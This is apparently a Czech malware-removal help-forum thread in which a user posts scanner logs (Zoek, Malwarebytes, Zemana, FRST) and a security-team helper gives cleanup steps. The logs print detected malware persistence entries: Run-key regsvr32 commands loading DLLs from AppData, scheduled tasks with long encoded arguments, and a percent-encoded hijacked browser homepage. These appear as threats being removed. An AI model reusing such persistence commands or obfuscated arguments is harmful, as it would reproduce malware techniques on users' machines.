[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> Smazáno
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [x] -> ERROR [2]
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> ERROR [2]
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{2745AA29-3952-43AA-B153-6B58BDAF514D}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Smazáno
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{25CFBDAA-1221-403A-AB6F-ED4028F32280}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Smazáno
¤¤¤ Úlohy : 5 ¤¤¤
[Suspicious.Path] %WINDIR%\Tasks\GFQtQALtXtjqpHeY4.job -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Smazáno
[Suspicious.Path] %WINDIR%\Tasks\wHAbZSf.job -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Smazáno
[Suspicious.Path] \GFQtQALtXtjqpHeY4 -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Smazáno
[Suspicious.Path] \ProgramDataUpdater -- "C:\windows\pdusvr.exe" -> Smazáno
[Suspicious.Path] \wHAbZSf -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Smazáno
¤¤¤ Soubory : 5 ¤¤¤
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.102.217.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.103.32.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.91.22.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.99.9.0\Microsoft.Win32.TaskScheduler.dll -> Smazáno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe -> Smazáno
¤¤¤ WMI : 0 ¤¤¤
¤¤¤ Soubor HOSTS : 0 ¤¤¤
¤¤¤ Antirootkit : 0 (Driver: Nahrán) ¤¤¤
¤¤¤ Webové prohlížeče : 1 ¤¤¤
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : homepage [https://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWqICWRlg5p-TqszN326G3dy3mHYlJU_leL3IAiGvFzeaOhUIyCJcFE286UNTO4eZPO86PKEGCfrynUmXb3uq_pSnNua3I7BZYgy6kJMdsqTokNPy2WiG_-BWzOIW7ddYj86VlhSK030NLtwh40HfLYPFfyklC09xHt43i2BpT] -> Smazáno
¤¤¤ Kontrola MBR : ¤¤¤
+++++ PhysicalDrive0: ST1000DM003-1ER162 +++++
--- User ---
[MBR] 0086f36f0b7bc8b257f89fc226376c3d
[BSP] 9e3b3c473b1db0daa516427cdae6e1cc : Windows Vista/7/8 MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 450 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 923648 | Size: 99 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1126400 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1159168 | Size: 199434 MB
4 - Basic data partition | Offset (sectors): 409600000 | Size: 753869 MB
User = LL1 ... OK
User = LL2 ... OK
Zoek.exe v5.0.0.1 Updated 27-09-2015
Tool run by Nekut on 15.03.2017 at 21:00:29,42.
Microsoft Windows 10 Home 10.0.14393 x64
Running in: Normal Mode No Internet Access Detected
Launched: C:\Users\Nekut\Downloads\zoek.exe [Scan all users] [Script inserted]
==== System Restore Info ======================
15.03.2017 21:01:08 Zoek.exe System Restore Point Created Successfully.
==== Reset Hosts File ======================
# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
==== Empty Folders Check ======================
C:\PROGRA~2\EaseUS deleted successfully
C:\PROGRA~2\GMT-MAX.ORG deleted successfully
C:\PROGRA~2\Paradox Interactive deleted successfully
C:\PROGRA~3\Comms deleted successfully
C:\PROGRA~3\iolo deleted successfully
C:\PROGRA~3\ProcessLasso deleted successfully
C:\PROGRA~3\SoftwareDistribution deleted successfully
C:\Users\Nekut\AppData\Local\Opera Software deleted successfully
C:\Users\Nekut\AppData\Local\Skype deleted successfully
C:\Users\Nekut\AppData\Local\Unity deleted successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\CrashDumps deleted successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Maps deleted successfully
==== Deleting CLSID Registry Keys ======================
==== Deleting CLSID Registry Values ======================
==== Deleting Services ======================
==== Deleting Files \ Folders ======================
C:\PROGRA~2\EaseUS not found
C:\PROGRA~2\GMT-MAX.ORG not found
C:\PROGRA~2\Paradox Interactive not found
C:\Users\Nekut\.android deleted
C:\ArchiCAD.exe deleted
C:\PROGRA~3\Package Cache deleted
C:\Users\Nekut\AppData\LocalLow\Unity deleted
C:\windows\SysNative\GroupPolicy\Machine deleted
C:\windows\SysNative\GroupPolicy\User deleted
"C:\WINDOWS\Installer\6e9261ef.msi" deleted
"C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4" deleted
"C:\Users\Nekut\AppData\Roaming\wHAbZSf" deleted
"C:\Users\Nekut\AppData\Roaming\{CEBA18AE-2A9A-6320-414B-A6E90A6F3D65}" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle\Local.key" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle\Local.pub" deleted
"C:\Users\Nekut\AppData\Roaming\iolo" deleted
"C:\Users\Nekut\AppData\Roaming\Tunngle" deleted
==== Chromium Look ======================
Google Chrome Version: 46.0.2490.86
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
efaidnbmnnnibpcajpcglclefindmkaj - No path found[]
lifbcibllhkdhoafpjfnlhfpfgnpldfl - No path found[]
internetquickaccess - Nekut\AppData\Local\Chromium\User Data\Default\Extensions\ddlhogjgfofpgmkognopimmilcldcepb
Chrome Media Router - Nekut\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm
==== Chromium Fix ======================
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_www.stlyrics.com_0.localstorage deleted successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_www.stlyrics.com_0.localstorage-journal deleted successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_c.betrad.com_0.localstorage deleted successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_c.betrad.com_0.localstorage-journal deleted successfully
==== Set IE to Default ======================
Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Use Search Asst"="yes"
New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://go.microsoft.com/fwlink/?LinkId=69157"
"Use Search Asst"="no"
==== All HKCU SearchScopes ======================
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
{012E1000-F331-11DB-8314-0800200C9A66} Google Url="http://www.google.com/search?q={searchTerms}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"
==== Reset Google Chrome ======================
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Secure Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences was reset successfully
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Web Data was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Web Data was reset successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal was reset successfully
==== Deleting Registry Keys ======================
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\FEE98B82400000001520FCF3A3907BD7 deleted successfully
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{28B89EEF-0004-0000-5102-CF3F3A09B77D} deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\FEE98B82400000001520FCF3A3907BD7 deleted successfully
==== Empty IE Cache ======================
C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\Users\Nekut\AppData\Local\Microsoft\Windows\INetCache\Low\IE emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
==== Empty FireFox Cache ======================
No FireFox Profiles found
==== Empty Chrome Cache ======================
C:\Users\Nekut\AppData\Local\Chromium\User Data\Default\Cache emptied successfully
C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully
==== Empty All Flash Cache ======================
No Flash Cache Found
==== Empty All Java Cache ======================
No Java Cache Found
==== C:\zoek_backup content ======================
C:\zoek_backup (files=164 folders=60 1447156033 bytes)
==== Empty Temp Folders ======================
C:\WINDOWS\Temp will be emptied at reboot
==== After Reboot ======================
==== Empty Temp Folders ======================
C:\WINDOWS\Temp successfully emptied
C:\Users\Nekut\AppData\Local\Temp successfully emptied
==== Empty Recycle Bin ======================
C:\$RECYCLE.BIN successfully emptied
==== EOF on 15.03.2017 at 21:18:40,78 ======================
- jaro3
- member of the Security team
Re: Please check my log
Uninstall that Spybot and install a free antivirus:
Avira, Avast, or Comodo.
- Run Malwarebytes' Anti-Malware again and click „Skenovat nyní“ (Scan Now).
- After the program finishes, a message will appear; click „Vše do karantény (smazat vybrané)“ (Quarantine All / remove selected), then „Exportovat záznam“ (Export Log) and choose „textový soubor“ (text file), give the file a name and save it somewhere. Copy the entire contents of that log here.
Download Zemana AntiMalware Free from this link:
https://www.zemana.com/Download/AntiMal ... .Setup.exe
and save it to your desktop.
Double-click the file on the desktop and follow the instructions to install the program.
Accept the program's license agreement (EULA) if prompted.
If a program update is available, click the „Update now“ button.
You can also enable the creation of a restore point:
Click the gear icon, then „Skenování“ (Scanning), and tick „vytvářet body obnovy“ (create restore points).
Go back (click the house icon).
Close all open files, folders and browsers.
Do not change any settings. Click „Skenovat“ (Scan).
After the scan you can see whether there are any infections. Click „Další“ (Next). The infections will be moved to quarantine.
When the scan is finished, a report will appear; copy the entire contents of that report here.
Otherwise, you can view the reports by clicking „zprávy“ (Reports) at the top right.
Please download the version of Farbar Recovery Scan Tool (FRST) appropriate for your system, 32-bit or 64-bit:
32-bit:
http://www.bleepingcomputer.com/downloa ... ool/dl/81/
64-bit:
http://www.bleepingcomputer.com/downloa ... ool/dl/82/
and save it to your desktop, then run FRST.
Confirm the terms of use.
Do not change any of the default settings and click „Scan“ („Skenovat“). When the scan is finished, two logs will appear, FRST.txt and Addition.txt, and they will be saved on the desktop. Please copy their entire contents here.
When working with HJT, ComboFix, MbAM, SDFix, etc., close all other applications and browsers!
Do not send logs via private messages. During my absence, memphisto, Žbeky and Orcus stand in for me.
If you are satisfied, you can support our forum: Forum support
Re: Please check my log
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 21:58
Logovací soubor: log mb.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1511
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 433327
Uplynulý čas: 18 min, 10 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Povoleno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 0
(Nebyly zjištěny žádné škodlivé položky)
Soubor: 0
(Nebyly zjištěny žádné škodlivé položky)
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
Zemana AntiMalware 2.72.2.176 (instalační verze)
-------------------------------------------------------
Scan Result : Dokončeno
Scan Date : 2017.3.16
Operating System : Windows 10 64-bit
Processor : 4X Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz
BIOS Mode : UEFI
CUID : 12CA5EF39989E83989550B
Scan Type : Skenování systému
Duration : 8m 20s
Scanned Objects : 90613
Detected Objects : 9
Excluded Objects : 0
Read Level : Normal
Auto Upload : Zapnuto
Detect All Extensions : Vypnuto
Scan Documents : Vypnuto
Domain Info : WORKGROUP,0,2
Detected Objects
-------------------------------------------------------
Internet Explorer Shortcut
Status : Skenováno
Object : "
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Podezřelé nastavení prohlížeče
Cleaning Action : Opravit
Related Objects :
Nastavení prohlížeče - Internet Explorer Shortcut
chrome.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
chrome_child.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome_child.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
chrome_elf.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome_elf.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
chrome_watcher.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\chrome_watcher.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
delegate_execute.exe
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\delegate_execute.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
setup.exe
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\installer\setup.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
metro_driver.dll
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\metro_driver.dll
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
nacl64.exe
Status : Skenováno
Object : NE->c:\users\nekut\appdata\local\chromium\application\45.0.2433.0\nacl64.exe
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Adware:Win32/FakeBrowser!Neng
Cleaning Action : Karanténa
Related Objects :
(null) - (null)
Cleaning Result
-------------------------------------------------------
Cleaned : 9
Reported as safe : 0
Failed : 0
Re: Please check my log
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by Nekut (16-03-2017 16:48:03)
Running from C:\Users\Nekut\Desktop
Windows 10 Home Version 1607 (X64) (2016-09-27 17:22:44)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2417313614-488722605-2671369154-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2417313614-488722605-2671369154-503 - Limited - Disabled)
Guest (S-1-5-21-2417313614-488722605-2671369154-501 - Limited - Disabled)
Nekut (S-1-5-21-2417313614-488722605-2671369154-1001 - Administrator - Enabled) => C:\Users\Nekut
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
3DMark 11 (HKLM-x32\...\{f9e83b9c-ab7e-4005-8f32-4ea69703a5e4}) (Version: 1.0.132.0 - Futuremark)
3DMark 11 (Version: 1.0.132.0 - Futuremark) Hidden
4Story CZ 5.2.233 (HKLM-x32\...\4Story_CZ_is1) (Version: 5.2.233 - Gameforge4D GmbH)
A360 Desktop (HKLM\...\{7758802D-9486-4883-9927-CCAC366A3BA4}) (Version: 7.2.3.1800 - Autodesk)
ACAD Private (Version: 21.0.52.0 - Autodesk) Hidden
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Age of Chivalry (HKLM-x32\...\Steam App 17510) (Version: - Team Chivalry)
AIDA64 Extreme v5.00 (HKLM-x32\...\AIDA64 Extreme_is1) (Version: 5.00 - FinalWire Ltd.)
Amnesia. A Machine for Pigs, âĺđńč˙ 1.0 (HKLM-x32\...\Amnesia. A Machine for Pigs_is1) (Version: 1.0 - DangeSecond)
Ansel (Version: 376.19 - NVIDIA Corporation) Hidden
ASTRO Command Center (HKLM-x32\...\{78FAE775-D963-4031-97CC-75D96FF648EB}) (Version: 1.0.121 - Astro Gaming)
AutoCAD 2017 - English (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 Language Pack - English (Version: 21.0.52.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2017 (HKLM-x32\...\{8ED2ED41-4455-449D-993C-751C039089B9}) (Version: 15.11.3.0 - Autodesk)
Autodesk App Manager 2016-2017 (HKLM-x32\...\{C0954809-F5DC-426C-847E-8409DE14E4C0}) (Version: 2.2.0 - Autodesk)
Autodesk AutoCAD 2017 - English (HKLM\...\AutoCAD 2017 - English) (Version: 21.0.52.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.5 (HKLM-x32\...\{8600F844-9AA5-412E-B6F2-F9C6CBCFD268}) (Version: 1.2.5.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2017 Add-in 64 bit (HKLM\...\{276A67E0-71EB-4827-B5F7-2ACF02BC1A5B}) (Version: 4.37.6853 - Autodesk)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Material Library 2017 (HKLM-x32\...\{8FB9F735-D64C-4991-8D91-4CDDAB1ABDEE}) (Version: 15.11.3.0 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2017 (HKLM-x32\...\{3FBFBC43-9882-43FA-B979-2D53896747B3}) (Version: 15.11.3.0 - Autodesk)
Autodesk ReCap 360 (HKLM\...\Autodesk ReCap 360) (Version: 3.0.0.52 - Autodesk)
Autodesk ReCap 360 (Version: 3.0.0.52 - Autodesk) Hidden
AVG Zen (Version: 1.22.1 - AVG Technologies) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
BitTorrent (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\BitTorrent) (Version: 7.9.9.43296 - BitTorrent Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.24 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5790 - CDBurnerXP)
Cities Skylines Natural Disasters (HKLM-x32\...\Cities Skylines Natural Disasters_is1) (Version: - )
CodeMeter Runtime Kit v5.10a (HKLM\...\{CADFF08A-A157-474F-B6A8-8F26F81F7ABE}) (Version: 5.10.1224.501 - WIBU-SYSTEMS AG)
COMODO Internet Security Premium (HKLM\...\COMODO Internet Security) (Version: 10.0.0.6092 - COMODO Security Solutions Inc.)
COMODO Internet Security Premium (Version: 10.0.0.6092 - COMODO Security Solutions Inc.) Hidden
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.11 - Electronic Arts)
Euro Truck Simulator 2 (HKLM-x32\...\Euro Truck Simulator 2_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Farming Simulator 15 (HKLM-x32\...\Farming Simulator 15_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Fraps (HKLM-x32\...\Fraps) (Version: - )
Futuremark SystemInfo (HKLM-x32\...\{032DC00A-51D1-4D28-BFB7-1D0E85291E11}) (Version: 4.25.366 - Futuremark)
Gameforge Live 2.0.12 (HKLM-x32\...\{9C98989A-3A15-42DA-A3B9-D20331437D67}}_is1) (Version: 2.0.12 - Gameforge)
Goat Simulator Waste of Space (HKLM\...\Z29hdHNpbXVsYXRvcg_is1) (Version: 1 - )
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
Grand Theft Auto San Andreas version 1.1.0.0 (HKLM-x32\...\Grand Theft Auto San Andreas_is1) (Version: 1.1.0.0 - Mr DJ)
Cheat Engine 6.5 (HKLM-x32\...\Cheat Engine 6.5_is1) (Version: - Cheat Engine)
Import souborů SketchUp 2016-2017 (HKLM-x32\...\{063925DB-9D8C-48E2-8F04-1B7038B6C783}) (Version: 2.2.0 - Autodesk)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1153 - Intel Corporation)
Intel(R) Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.100.1519.7 - Intel Corporation)
Intel® Chipset Device Software (x32 Version: 10.0.27 - Intel(R) Corporation) Hidden
Intel® Security Assist (HKLM-x32\...\{4B230374-6475-4A73-BA6E-41015E9C5013}) (Version: 1.0.0.532 - Intel Corporation)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: - )
IsoBuster 3.7 (HKLM-x32\...\IsoBuster_is1) (Version: 3.7 - Smart Projects)
Java 8 Update 66 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218066F0}) (Version: 8.0.660.18 - Oracle Corporation)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
LOOT version 0.9.2 (HKLM-x32\...\{BF634210-A0D4-443F-A657-0DCE38040374}_is1) (Version: 0.9.2 - LOOT Team)
Malwarebytes verze 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
